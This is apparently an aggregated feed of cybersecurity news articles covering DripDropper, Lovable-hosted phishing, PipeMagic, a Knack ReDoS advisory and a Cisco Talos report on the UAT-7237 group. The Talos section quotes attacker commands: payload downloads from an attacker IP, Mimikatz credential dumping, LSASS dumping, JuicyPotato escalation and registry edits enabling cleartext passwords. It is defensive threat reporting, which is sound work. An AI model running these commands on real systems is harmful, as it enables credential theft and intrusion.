A new report from Red Canary reveals a clever Linux malware called DripDropper that exploits a flaw and…

A new report from Red Canary reveals a clever Linux malware called DripDropper that exploits a flaw and then patches it to prevent other hackers from getting in. Learn how this tactic works.

A new report by cybersecurity firm Red Canary reveals that hackers are exploiting a critical vulnerability and then patching it to lock out other attackers. The research from the Red Canary Threat Intelligence team, provided to Hackread.com, exposes a new piece of Linux malware, which the company named DripDropper, and details how adversaries are using it to gain and maintain hidden access on cloud servers.

The attack starts with exploiting a well-known security flaw, CVE-2023-46604, in a widely used piece of software called Apache ActiveMQ. This program is a “message broker,” which is a fancy term for a tool that helps different computer systems talk to each other. Although a patch has been available for some time, many systems are still vulnerable, and hackers are taking advantage of this weakness to get initial access.

“Even though the critical vulnerability exploited in ActiveMQ here is nearly three years old, adversaries are still exploiting the vulnerability to execute payloads such as Godzilla Webshell, and Ransomhub ransomware, resulting in a 94.44% likelihood of being exploited in the next 30 days, according to its EPSS score,” researchers noted.

****Strategy for Persistence****

After gaining a foothold, the hackers install two main tools. The first is a malicious software called Sliver, a tool that gives them secret, unrestricted control over the compromised computer.

They then use a downloader (DripDropper) that connects to a Dropbox account controlled by the attacker. This malware is an encrypted file that requires a password to run, making it tough for security analysts to examine.

But the most surprising part of the attack comes next. After establishing their control, the hackers use a common internet command to download a legitimate patch for the very vulnerability they just exploited.

By patching the system, they essentially close the door they used to get in, preventing other criminals from exploiting the same weakness. This clever move ensures their grip remains exclusive and makes it harder for defenders to trace the attack back to the original entry point.

To ensure long-term access, the DripDropper malware modifies system files to allow root logins and keep itself running. The malware also drops a second file with a random, eight-character name, which also contacts the attackers’ Dropbox for further instructions.

Researchers noted that using public platforms like Dropbox is a common tactic also used by other malware families such as CHIMNEYSWEEP, Mustang Panda, and WhisperGate.

These findings highlight that a clean vulnerability scan doesn’t always mean a system is secure. A scan might show a system is patched, but it won’t reveal how or by whom. This means, a multi-layered security approach is needed, including consistent patching and careful monitoring of cloud logs. The report also recommends using resources like CISA’s Known Exploited Vulnerabilities (KEV) catalogue to help prioritize which flaws to fix first.

_“_I’m not sure I’ve heard of automated malware that patched the vulnerability it used to break in, except maybe once before back in the 1990s, when two computer virus groups were battling it out for global control using the same software vulnerability. I have, however, been involved in a few consulting engagements over the years where human hackers broke in and patched the exploits,_“_ said Roger Grimes, Data-Driven Defense Evangelist at KnowBe4.

“Once, when I was with Microsoft, I was hired to help consult with a customer who was mad that Microsoft was applying a patch that they had configured NOT to apply. It was a controversial patch at the time (it disabled the otherwise default autorun feature in Microsoft Windows when mobile media was inserted into a computer),” he explained.

_“_A lot of customers were mad that Microsoft was disabling autoruns, so Microsoft configured the patch to not automatically deploy if a particular related registry entry was enabled. Well, for this particular customer, the patch kept applying. They would then uninstall the patch, make sure the related registry entry was made, and then come back the next day to find the patch re-applied. Boy, they were mad_.”_

“When I showed up, I quickly discovered that a hacker group had broken in using the vulnerability, and they were trying to apply the patch to disable the autoruns feature to prevent other groups. Boy, was that client feeling mea culpa.”

“I said it then, and I’ll say it now, “If hackers are doing your patching faster than you are, you aren’t doing it right!” This is yet another argument for default auto-patching without admin involvement. We’ve yet again seen serious vulnerabilities that have not been patched years later. It’s all too common,” Roger added.

New DripDropper Malware Exploits Linux Flaw Then Patches It Lock Rivals Out

Scammers have been spotted abusing AI site builder Lovable to mimic trusted brands, steal credentials, drain crypto wallets,…

Scammers have been spotted abusing AI site builder Lovable to mimic trusted brands, steal credentials, drain crypto wallets, and spread malware.

Cybersecurity researchers at Proofpoint report that cybercriminals are abusing Lovable, an AI-powered website builder, to spin up fraudulent sites in minutes that mimic trusted brands and distribute malware.

Lovable was designed as a user-friendly tool for anyone with limited web development experience. Users simply type a description of the website they want, and the service generates a working site, hosted under the lovable.app domain.

The site offers creating free accounts that come with hosting and a visible “Edit with Lovable” badge, while paid users can hide the badge and attach custom domains. For legitimate users, it is a shortcut to publishing websites quickly. For threat actors, it has become an opportunity to scam unsuspecting people.

Proofpoint has tracked campaigns where Lovable-hosted sites distribute credential phishing kits such as Tycoon, payment data harvesters, and even cryptocurrency wallet drainers.

To test it in detail, researchers found no restrictions when attempting to build their own phishing site using Lovable, including functionality to mimic enterprise login portals. They reported hundreds of thousands of malicious Lovable URLs detected in email data each month since February 2025, with campaigns increasing gradually.

In one campaign from February 2025, attackers used lovable.app URLs to direct victims through a CAPTCHA page before loading a fake Microsoft login. The setup was powered by Tycoon, a Phishing-as-a-Service platform capable of stealing credentials, tokens, and session cookies. Later campaigns imitated HR messages about employee benefits to trick recipients into entering their corporate login details.

Via Proofpoint

According to Proofpoint’s report shared with Hackread.com ahead of publishing on Wednesday, 20, 2025, cybercriminals are also using Lovable to mimic logistics firms and payment services.

In June 2025, Proofpoint spotted a campaign impersonating UPS, with nearly 3,500 messages leading to a fake UPS website that harvested credit card details and personal information, then sent them directly to Telegram. The project template used for this scam was publicly “remixable” on Lovable, meaning anyone could adapt it for new attacks with little effort.

One campaign impersonated DeFi service Aave, tricking victims into connecting their wallets to fraudulent sites created through Lovable. Researchers also identified other cryptocurrency-themed apps built with the tool that appeared designed to steal credit card details or siphon funds from connected wallets.

****Not Just Phishing****

In July 2025, Proofpoint discovered a campaign in German that used Lovable to host a fake invoice download page. Victims who clicked the link were served a trojanized file loader that ultimately delivered the remote access trojan zgRAT. Similar campaigns were later observed in English with minor adjustments to target different organizations.

****Lovable Alerted****

Proofpoint disclosed its findings to Lovable, which responded by correlating the data with its own investigations. According to the company, one phishing cluster with hundreds of domains was taken down in the same week.

Lovable also said it has rolled out AI-driven safeguards, including real-time detection of malicious prompts and daily scanning of published projects, with additional protections for account abuse planned for later this year.

AI Website Builder Lovable Abused for Phishing and Malware Scams

Disclosure: This article was provided by ANY.RUN. The information and analysis presented are based on their research and findings.

Phishing is no longer about badly written emails asking you to “click here.” Today’s attacks are business-grade, powered by AI and packaged in ready-to-use phishing kits. That means cybercriminals can now launch believable spearphishing campaigns in hours.

For companies, this raises the stakes. A single successful phishing email can expose confidential data, disrupt operations, and damage reputation. The question for managers is no longer whether phishing will target your organization, but how fast your team can detect and stop it.

****Why Modern Phishing is Harder to Catch****

Attackers have leveled up, and traditional filters struggle to keep up.

*   **AI-driven precision**: Attackers now generate flawless, personalized messages with no spelling or grammar mistakes, making them harder to spot by humans and machines.
*   **Phishkits for everyone**: These pre-built toolkits allow even inexperienced criminals to create convincing campaigns quickly.
*   **Advanced evasion**: Links hidden in QR codes, fake CAPTCHAs, and multi-step **redirect chains** slip past email filters and secure gateways.

Even well-equipped SOC teams find it challenging to separate real threats from the noise. And delays in detection create costly risks: longer investigation times, higher chances of compromise, and increased business impact.

****The Solution to Stopping Modern Phishing****

The most effective way companies are preventing data theft today is through interactive analysis. Unlike traditional tools that only scan for known indicators, interactive analysis simulates the entire attack journey as if a real user were engaging with the email or file.

This means hidden tricks, whether they involve layered redirects, fake login pages, or other evasive steps, are exposed in full. Security teams gain clear visibility into the entire execution chain, from the initial lure to the final payload.

Spearphishing attack caught inside ANY.RUN sandbox

That’s why more and more organizations are turning to interactive sandboxes like ANY.RUN. They provide teams with the insight needed to understand exactly how an attack unfolds, making it possible to block threats before they lead to data loss.

Visibility is powerful, but what makes the difference for modern teams is **automation**. This is where sandboxes like ANY.RUN excel, turning interactive analysis into a fully automated process that integrates seamlessly with existing SOC stacks. 

Let’s look at how this works in practice with a real-world phishing attempt aimed at Hitachi Energy employees.

Real Case: A Multi-Stage Phishing Attack Against Hitachi

The attack began with what looked like a normal HR email from “Hitachi Energy”, asking employees to review a new company policy. Polished design, urgent tone, even a security reminder; everything about it was convincing enough to slip past traditional filters and catch employees off guard.

With the help of automation, ANY.RUN was able to fully unravel this attack in a safe environment.

Fast verdict of malicious behaviour with relevant tags exposed inside ANY.RUN sandbox

**Malicious PDF Detected**

The attachment appeared harmless but contained a QR code instead of a clickable link; a tactic specifically designed to evade email security systems. ANY.RUN’s sandbox automatically flagged the suspicious behavior.

QR code with a hidden malicious URL detected by ANY.RUN

This early detection helps prevent employees from unknowingly scanning QR codes that lead to hidden threats.

**Hidden Link Extraction**

Once automated interactivity was enabled, the sandbox scanned the QR code, extracted the hidden URL, and opened it inside a browser, continuing the attack chain without analyst involvement.

  
**Bypassing CAPTCHA**

The attackers added another layer of defense: a Cloudflare CAPTCHA, meant to stop automated tools. ANY.RUN solved it automatically, just like a human would, and continued the investigation.

CAPTCHA verified automatically, saving time and effort

As a result, security teams don’t get stuck at roadblocks, saving hours of manual testing and guaranteeing deeper visibility.

**Credential Harvesting Page Exposed**

The final stop was a fake Microsoft login page, designed to steal employee credentials. A well-crafted replica that many people would likely trust. By exposing the fake login page safely, the sandbox provided teams with a clear malicious verdict before any real credentials could be compromised.

Fake Microsoft page designed to steal credentials

**IOC Collection and Reporting**

Along the way, ANY.RUN gathered all IOCs (indicators of compromise), mapped the attacker’s processes, and generated a detailed report ready for sharing across the SOC.

Well-structured report for sharing between team members

These IOCs can be fed directly into SIEM/SOAR systems to strengthen detection rules, train employees, and build a strategy that prevents similar data theft attempts in the future.

****How Automation Strengthens Phishing Response****

Modern phishing campaigns aren’t just technical challenges but also operational ones. Attacks like the Hitachi case are designed to drain time, mislead staff, and slip through traditional defenses. Automation changes the equation, giving organizations the ability to handle phishing with speed and confidence.

*   **Faster, Reliable Decisions:** Move from a suspicious email to a clear, evidence-backed verdict in minutes. Faster decisions mean less downtime, lower risk of data theft, and reduced financial exposure.
*   **Reduced Operational Costs:** With automation handling phishing detection end-to-end, fewer staff hours are wasted on repetitive checks. Your team can cover more ground without increasing headcount.
*   **Optimized Talent Use:** Junior staff can confidently handle phishing triage with automated support, while senior analysts dedicate their time to higher-value activities like threat hunting and strategy.
*   **Lower Business Risk:** By exposing full attack chains, including hidden redirects and fake login pages, managers get assurance that threats are caught before credentials or sensitive data are stolen.
*   **Proven Efficiency Gains:** Organizations using ANY.RUN have reported up to **3x faster phishing detection and response times**, translating to fewer escalations, stronger compliance, and lower incident costs.

****Expose Phishing Tricks Before Data is Stolen****

  
Phishing attacks are becoming harder to spot, but with ANY.RUN, organizations don’t have to rely on guesswork or slow manual checks. By automating interactive analysis, the sandbox reveals every hidden step, so teams can act before data is compromised. 

With clear reports, ready-to-use IOCs, and seamless SOC integration, ANY.RUN helps businesses cut investigation time, reduce analyst workload, and strengthen defenses where it matters most.

How to Automate Phishing Detection to Prevent Data Theft

Microsoft Knack 0.12.0 allows Regular expression Denial of Service (ReDoS) in the knack.introspection module (issue 2 of 2).

**Exploitability Metrics**

Attack Vector: This metric reflects the context by which vulnerability exploitation is possible. This metric value (and consequently the resulting severity) will be larger the more remote (logically, and physically) an attacker can be in order to exploit the vulnerable system. The assumption is that the number of potential attackers for a vulnerability that could be exploited from across a network is larger than the number of potential attackers that could exploit a vulnerability requiring physical access to a device, and therefore warrants a greater severity.

Attack Complexity: This metric captures measurable actions that must be taken by the attacker to actively evade or circumvent existing built-in security-enhancing conditions in order to obtain a working exploit. These are conditions whose primary purpose is to increase security and/or increase exploit engineering complexity. A vulnerability exploitable without a target-specific variable has a lower complexity than a vulnerability that would require non-trivial customization. This metric is meant to capture security mechanisms utilized by the vulnerable system.

Attack Requirements: This metric captures the prerequisite deployment and execution conditions or variables of the vulnerable system that enable the attack. These differ from security-enhancing techniques/technologies (ref Attack Complexity) as the primary purpose of these conditions is not to explicitly mitigate attacks, but rather, emerge naturally as a consequence of the deployment and execution of the vulnerable system.

Privileges Required: This metric describes the level of privileges an attacker must possess prior to successfully exploiting the vulnerability. The method by which the attacker obtains privileged credentials prior to the attack (e.g., free trial accounts), is outside the scope of this metric. Generally, self-service provisioned accounts do not constitute a privilege requirement if the attacker can grant themselves privileges as part of the attack.

User interaction: This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable system. This metric determines whether the vulnerability can be exploited solely at the will of the attacker, or whether a separate user (or user-initiated process) must participate in some manner.

**Vulnerable System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the VULNERABLE SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the VULNERABLE SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the VULNERABLE SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

**Subsequent System Impact Metrics**

Confidentiality: This metric measures the impact to the confidentiality of the information managed by the SUBSEQUENT SYSTEM due to a successfully exploited vulnerability. Confidentiality refers to limiting information access and disclosure to only authorized users, as well as preventing access by, or disclosure to, unauthorized ones.

Integrity: This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information. Integrity of the SUBSEQUENT SYSTEM is impacted when an attacker makes unauthorized modification of system data. Integrity is also impacted when a system user can repudiate critical actions taken in the context of the system (e.g. due to insufficient logging).

Availability: This metric measures the impact to the availability of the SUBSEQUENT SYSTEM resulting from a successfully exploited vulnerability. While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email). Since availability refers to the accessibility of information resources, attacks that consume network bandwidth, processor cycles, or disk space all impact the availability of a system.

GHSA-xh9h-692f-mmg4: Microsoft Knack ReDoS Vulnerability in the Introspection Module

Microsoft Knack 0.12.0 allows Regular expression Denial of Service (ReDoS) in the knack.introspection module (issue 1 of 2).

GHSA-6fxp-p9mg-q64w: Microsoft Knack ReDoS Vulnerability in the Introspection Module

Microsoft warns that a fake ChatGPT desktop app was used to deliver PipeMagic malware, linked to ransomware attacks…

Microsoft warns that a fake ChatGPT desktop app was used to deliver PipeMagic malware, linked to ransomware attacks exploiting a Windows zero-day.

Cybersecurity researchers at Microsoft discovered a new backdoor called PipeMagic while investigating attacks that abused a zero-day flaw in Windows CLFS (CVE-2025-29824). What makes this backdoor dangerous is how it poses as a legitimate open-source ChatGPT desktop application while delivering a framework for running ransomware operations.

PipeMagic relies on a modular design that loads different components as needed. These modules handle everything from command-and-control communication to payload execution, all while staying hidden through encrypted named pipes and in-memory operations. By separating its functions this way, the backdoor makes it far more difficult for defenders to detect or analyze.

It is worth noting that the ChatGPT Desktop project on GitHub mentioned by Microsoft (available here) is not malicious. What happened is that attackers used a trojanized copy of this app, since it’s open source, modified with hidden code, to deliver the PipeMagic backdoor. The legitimate version remains safe, but downloading from unofficial or compromised sites carries the risk of infection.

> _“The first stage of the PipeMagic infection execution begins with a malicious in-memory dropper disguised as the open-source ChatGPT Desktop Application project. The threat actor uses a modified version of the GitHub project that includes malicious code to decrypt and launch an embedded payload in memory.”_
> 
> Microsoft

****PipeMagic Attributed to Storm-2460****

Microsoft attributes PipeMagic to a financially motivated group known as Storm-2460. In recent campaigns, the group used it alongside CVE-2025-29824, a privilege escalation vulnerability, to move from initial access to ransomware deployment.

The attacks have not been limited to one industry or geography, with victims identified targeting financial and real estate organizations in the United States, Europe, South America, and the Middle East.

Researchers examining PipeMagic found that it manages payloads through a set of linked lists that act like internal queues. Some lists hold modules waiting to be executed, others manage network communication, while one list remains unexplained but appears to be used dynamically by loaded payloads. This structure allows Storm-2460 to update or replace components on the fly, giving them flexibility without having to redeploy the entire backdoor.

According to Microsoft’s long technical blog post, the communication layer of PipeMagic is equally sophisticated. Instead of connecting directly to its command server, the backdoor loads a dedicated networking module that establishes a WebSocket-style connection with its operators.

This design keeps network traffic isolated from the rest of the backdoor, limiting detection opportunities. Once a secure channel is active, PipeMagic sends detailed system information, including bot ID, domain details, process integrity, and user context, before receiving instructions on what modules to run or which data to exfiltrate.

Storm-2460 can also insert new modules, update existing ones, gather hashes, enumerate processes, and even rename the backdoor executable for self-deletion. Therefore, Microsoft has released detections across Microsoft Defender products and is urging organizations to review their security.

PipeMagic shows just how far backdoors have evolved. By using a zero-day exploit with a modular backdoor, Storm-2460 built a tool that easily bypasses detection. The full Microsoft analysis goes deep into its internal structures and also offers mitigation guidance.

Fake ChatGPT Desktop App Delivering PipeMagic Backdoor, Microsoft

Cybersecurity researchers have lifted the lid on the threat actors' exploitation of a now-patched security flaw in Microsoft Windows to deploy the PipeMagic malware in RansomExx ransomware attacks.
The attacks involve the exploitation of CVE-2025-29824, a privilege escalation vulnerability impacting the Windows Common Log File System (CLFS) that was addressed by Microsoft in April 2025,

Microsoft Windows Vulnerability Exploited to Deploy PipeMagic RansomExx Malware

A list of topics we covered in the week of August 11 to August 17 of 2025

August 15, 2025 - A cybercriminal was found selling scanned IDs that were stolen from guests at Italian hotels on underground forums, warned CERT-AGID.

August 15, 2025 - National Public Data has changed ownership. Does this mean your personal information has changed hands too?

August 14, 2025 - Four men from Ghana were extradited for their alleged role in stealing more than $100 million through romance scams and BEC.

August 14, 2025 - Scammers are sending out fake Netflix job offers to get control of Facebook accounts.

August 13, 2025 - In the August 2025 patch Tuesday round Microsoft fixed a total of 111 Microsoft vulnerabilities, some of which are very important.

 A week in security (August 11 &#8211; August 17) 

The threat actor known as EncryptHub is continuing to exploit a now-patched security flaw impacting Microsoft Windows to deliver malicious payloads.
Trustwave SpiderLabs said it recently observed an EncryptHub campaign that brings together social engineering and the exploitation of a vulnerability in the Microsoft Management Console (MMC) framework (CVE-2025-26633, aka MSC EvilTwin) to trigger

Russian Group EncryptHub Exploits MSC EvilTwin Vulnerability to Deploy Fickle Stealer Malware

Cisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since at least 2022, which has significant overlaps with UAT-5918.

*   Cisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since at least 2022, which has significant overlaps with UAT-5918.
*   UAT-7237 conducted a recent intrusion targeting web infrastructure entities within Taiwan and relies heavily on the use of open-sourced tooling, customized to a certain degree, likely to evade detection and conduct malicious activities within the compromised enterprise.
*   UAT-7237 aims to establish long-term persistence in high-value victim environments.
*   Talos also identified a customized Shellcode loader in UAT-7237's arsenal that we track as “SoundBill.” SoundBill can be used to decode and load any shellcode, including Cobalt Strike.

Talos assesses with high confidence that UAT-7237 is a Chinese-speaking APT group, focusing heavily on establishing long-term persistence in web infrastructure entities in Taiwan. Most of UAT-7237's tooling consists of open-sourced tools, customized to a certain extent, including the use of a customized Shellcode loader we track as “SoundBill.”

Talos further assesses that UAT-7237 is likely a subgroup of UAT-5918, operating under the same umbrella of threat actors. UAT-7237's tooling, victimology and dates of activity overlap significantly with UAT-5918. Additionally, both threat groups develop, customize and operate tooling using the Chinese language as their preliminary language of choice.

While Talos assesses that UAT-7237 is a subgroup of UAT-5918, there are some deviations in UAT-7237's tactics, techniques and procedures (TTPs) that necessitate its designation as a distinct threat actor:

*   UAT-7237 primarily relies on the use of Cobalt Strike as its staple backdoor implant while UAT-5918 relies primarily on Meterpreter based reverse shells.
*   After a successful compromise, UAT-5918 typically deploys a flurry of web shells. However, UAT-7237's deployment of web shells is highly selective and only on a chosen few compromised endpoints.
*   While UAT-5918 relies on web shells as their primary channel of backdoor access, UAT-7237 relies on a combination of direct remote desktop protocol (RDP) access and SoftEther VPN clients to achieve the same.

In a recent intrusion, UAT-7237 compromised, infiltrated and established long term persistence in a Taiwanese web hosting provider. It is worth noting that the threat actor had a particular interest in gaining access to the victim organization’s VPN and cloud infrastructure. UAT-7237 used open-source and customized tooling to perform several malicious operations in the enterprise, including reconnaissance, credential extraction, deploying bespoke malware, setting up backdoored access via VPN clients, network scanning and proliferation.

**Initial access and reconnaissance**

UAT-7237 gains initial access by exploiting known vulnerabilities on unpatched servers exposed to the internet. Once the target has been successfully compromised, UAT-7237, like any other stealth-oriented APT, conducts rapid fingerprinting to evaluate if the target is worth conducting further malicious actions on.

Reconnaissance consists of identifying remote hosts, both internal and on the internet:

cmd /c nslookup <victim’s\_domain>
cmd /c systeminfo
cmd /c curl
cmd /c ping 8\[.\]8\[.\]8\[.\]8                            
cmd /c ping 141\[.\]164\[.\]50\[.\]141          // Attacker controlled remote server.
cmd /c ping <victim’s\_domain>
cmd /c ipconfig /all

While UAT-5918 immediately begins deploying web shells to establish backdoored channels of access, UAT-7237 deviates significantly, using the SoftEther VPN client (similar to Flax Typhoon) to persist their access, and later access the systems via RDP:

cmd /c c:\\temp\\WM7Lite\\download\[.\]exe  hxxp\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/win-x64\[.\]rar c:\\temp\\WM7Lite\\1\[.\]rar

powershell (new-object System\[.\]Net\[.\]WebClient).DownloadFile('hxxp\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/vpn\[.\]rar','C:\\Windows\\Temp\\vmware-SYSTEM\\vmtools\[.\]rar')

Once UAT-7237 sets up initial access, reconnaissance and VPN-based access, they start preparing to pivot to additional systems in the enterprise to proliferate and conduct malicious activities:

cmd\[.\]exe /c cd /d "<remote\_smb\_share>"&net use
cmd\[.\]exe /c cd /d "<remote\_smb\_share>"&dir \\\\<remote\_smb\_share>\\c$\\
cmd\[.\]exe /c cd /d "C:\\"&net group "domain admins" /domain
cmd\[.\]exe /c cd /d "C:\\"&net group "domain controllers" /domain

In addition to relying on living-off-the-land binaries (LOLBins), UAT-7237 actively employed Windows Management Instrumentation (WMI) based tooling during reconnaissance and proliferation such as SharpWMI and WMICmd:

cmd\[.\]exe /c cd /d "C:\\"&C:\\ProgramData\\dynatrace\\sharpwmi\[.\]exe <IP> <user> <pass> cmd whoami

cmd.exe /c cd /d "C:\\DotNet\\"&WMIcmd.exe

wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c whoami
  
wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c netstat -ano >c:\\1.txt

 SharpWMI and WMICmd can both be used to execute WMI queries on remote hosts, and they allow for arbitrary command and code executions.

UAT-7237 fingerprinted any systems subsequently accessed using rudimentary window commands such as:

cmd.exe /c systeminfo
cmd.exe /c tasklist
cmd.exe /c net1 user /domain
cmd.exe /c whoami /priv
cmd.exe /c quser

**Post-compromise tooling and actions on objectives****SoundBill**

After compromise, UAT-7237 deploys a variety of customized and open-source tooling to perform a variety of tasks on the infected endpoints. Talos tracks one of UAT-7237's custom-built tools as “SoundBill.” SoundBill is built based on  “VTHello” and is a shellcode loader written in Chinese that will decode a file on disk named “ptiti.txt” and execute the resulting shellcode.

It is also worth noting that SoundBill contains two embedded executables. Both originate from QQ, a Chinese instant messaging software, and are likely used as decoy files in attacks involving spear phishing.

SoundBill’s payload (i.e., the shellcode) may be anything from, for example, a customized implementation of Mimikatz:

VTSB.exe privilege::debug sekurlsa::logonpasswords exit

Or it may be a mechanism to execute arbitrary commands on the infected system, such as:

c:\\temp\\vtsb.exe -c whoami

The shellcode may even be a position-independent Cobalt Strike payload that allows UAT-7237 to establish long term access for information stealing. So far, the Cobalt Strike beacons Talos have found to be compatible with SoundBill communicate over HTTPS with its command and control (C2): cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1\[.\]on\[.\]aws

**JuicyPotato**

UAT-7237 also uses JuicyPotato, a privilege escalation tool popular with Chinese-speaking threat actors, to execute multiple commands on endpoints such as:

cmd.exe /c c:\\hotfix\\juicy2.exe -t \* -c {6d18ad12-bde3-4393-b311-099c346e6df9} -p whoami

**Configuration changes**

During intrusions on several occasions, UAT-7237 attempted to make configuration and setting changes to the Windows OS on the infected endpoints, such as disabling User Account Control (UAC) restriction via registry:

reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system /v LocalAccountTokenFilterPolicy /t REG\_DWORD /d 1 /f

They also attempted to enable storage of cleartext passwords:

reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG\_DWORD /d 1 /f

UAT-7237 also accessed the Component Services management console, likely to adjust privileges for their malicious components:

mmc comexp.msc

**UAT-7237's pursuit of credentials**

UAT-7237 uses several mechanisms, predominantly Mimikatz, to extract credentials from the infected endpoints. However, the threat actor has evolved their use of Mimikatz over time, likely as a means of evading detection by using a Mimikatz instance built into SoundBill to extract credentials:

**Filename/command**

**Tooling name**

abc.dll

Comsvcs.dll for LSASS process dumping

Fileless.exe

Mimikatz

VTSB.exe privilege::debug sekurlsa::logonpasswords exit

SoundBill with the Mimikatz payload

Furthermore, UAT-7237 also finds VNC credentials and configuration from infected endpoints by searching the registry and disk:

reg query "HKCU\\Software\\ORL\\WinVNC3\\Password"
dir c:\\\*vnc.ini /s /b

Another (likely open-source) tool is used to execute commands on the endpoint, specifically to invoke a BAT file and another executable — again for credential extraction:

cmd.exe /c C:\\hotfix\\invoketest.exe  -cmd "cmd /c  C:\\hotfix\\1.bat"
cmd.exe /c C:\\hotfix\\invoketest.exe  -cmd "cmd /c   C:\\hotfix\\Project1.exe  C:\\hotfix\\SSP.dll"

“Project1\[.\]exe” above is the ssp\_dump\_lsass project on GitHub. It takes a DLL file as an argument, injects it into the Local Security Authority Service (LSASS)  process, which then dumps the LSASS process into a BIN file.

Optionally, JuicyPotato may be used to run the same credential extraction process via the BAT file:

cmd.exe /c c:\\hotfix\\juicy2.exe -t \* -c  {e60687f7-01a1-40aa-86ac-db1cbf673334} -p "c:\\windows\\system32\\cmd.exe"  -a "/c c:\\hotfix\\1.bat"

The process dump obtained is then staged into an archive for exfiltration:

cmd.exe /c "c:\\program files\\7-Zip\\7z.exe"  a  C:\\hotfix\\1.zip  C:\\hotfix\\1.bin

**Proliferating through the enterprise**

UAT-7237 uses the following network scanning tooling:

**FScan:** A network scanner tool used to scan for open ports against IP subnets:

fileless -h 10.30.111.1/24 -nopoc -t 20

**SMB scans:** To identify SMB services information on specific endpoints:

smb\_version 10.30.111.11 445

As soon as accessible systems are found, UAT-7237 will conduct additional recon to pivot to them using credentials they’ve extracted previously:

cmd\[.\]exe /c netstat -ano |findstr 3389
cmd\[.\]exe /c nslookup <victim’s\_subdomains>
cmd\[.\]exe /c net use  <IP>\\ipc$ <pass>  /user:<userid>
cmd\[.\]exe /c dir   \\\\<remote\_system>\\c$
cmd\[.\]exe /c net use  \\\\<remote\_system>\\ipc$ /del

**SoftEther VPN**

The remote server hosting the SoftEther VPN client consisted of two archives: one containing the Client executable and corresponding configuration, and another with the Executable and Linkable Format (ELF)-based server binary.

Talos' analysis of the SoftEther artifacts led to the following observations of UAT-7237's TTPs:

*   The server was created in September 2022 and was last used in December 2024, indicating that UAT-7237 may have been using SoftEther over a two-year period.
*   UAT-7237 specified Simplified Chinese as the preferred display language in their VPN client’s language configuration file, indicating that the operators were proficient with the language.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort rules cover this threat:

*   Snort v2 : 64908 - 64916
*   Snort v3: 301209 - 301212

**IOCs**

 IOCs for this research can also be found at our GitHub repository here. 

450fa9029c59af9edf2126df1d6a657ee6eb024d0341b32e6f6bdb8dc04bae5a - C:\\temp\\wmiscan.exe
6a72e4b92d6a459fc2c6054e9ddb9819d04ed362bd847333492410b6d7bae5aa - c:/hotfix/Project1.exe - ssp\_dump\_lsass tool
E106716a660c751e37cfc4f4fbf2ea2f833e92c2a49a0b3f40fc36ad77e0a044 - C:/hotfixlog/Fileless.exe - FScan
B52bf5a644ae96807e6d846b0ce203611d83cc8a782badc68ac46c9616649477 - C:/hotfixlog/smb\_version.exe
864e67f76ad0ce6d4cc83304af4347384c364ca6735df0797e4b1ff9519689c5 – fileless.exe - Mimikatz
 
SoundBill
Df8497b9c37b780d6b6904a24133131faed8ea4cf3d75830b53c25d41c5ea386
 
Cobalt Strike
0952e5409f39824b8a630881d585030a1d656db897adf228ce27dd9243db20b7
7a5f05da3739ad3e11414672d01b8bcf23503a9a8f1dd3f10ba2ead7745cdb1f
 
cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1\[.\]on\[.\]aws
http\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/win-x64\[.\]rar
141\[.\]164\[.\]50\[.\]141

Tag

#microsoft